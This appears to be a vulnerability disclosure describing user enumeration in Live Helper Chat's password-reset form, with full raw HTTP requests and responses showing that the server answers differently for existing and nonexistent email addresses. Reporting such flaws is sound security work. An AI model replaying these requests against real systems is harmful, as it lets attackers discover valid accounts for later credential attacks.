When resetting your password, you’re able to enumerate users based on the way that the server responds to your request. If you enter an email that doesn’t exist (for example: [email protected]), then the server will respond with an HTTP 302 FOUND status response code (indicated by line 97 of the occurrence link)
But if you attempt to reset the password for an account that you know exists (for example: [email protected]), then the server will respond with an HTTP 200 OK status response code and also responds with this page which indicates that a password reset email was sent (indicated by line 94 of the occurrence link)
/site_admin/user/forgotpassword
Request when email address doesn’t exist:
POST /site_admin/user/forgotpassword HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
Origin: https://demo.livehelperchat.com
DNT: 1
Connection: keep-alive
Referer: https://demo.livehelperchat.com/site_admin/user/forgotpassword
Cookie: lhc_vid=7a46a3918dffa927cd6a; PHPSESSID=ptlo9b3h7kq9cffurfp1ujb8cq
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
[email protected]
csfr_token=0604a0365f43ca1e52f3ee26f802a300
Forgotpassword=Restore password
Response when email address doesn’t exist:
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 03 Jan 2022 02:34:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
Location: /site_admin/user/forgotpassword
Request when email address does exist:
POST /site_admin/user/forgotpassword HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: https://demo.livehelperchat.com
DNT: 1
Connection: keep-alive
Referer: https://demo.livehelperchat.com/site_admin/user/forgotpassword
Cookie: lhc_vid=7a46a3918dffa927cd6a; PHPSESSID=n3u430nfrohrto8dm5pneg5uab
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
[email protected]
csfr_token=0604a0365f43ca1e52f3ee26f802a300
Forgotpassword=Restore password
Response when email address does exist:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Jan 2022 02:34:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
Content-Encoding: gzip
An attacker can exploit this vulnerability in order to enumerate users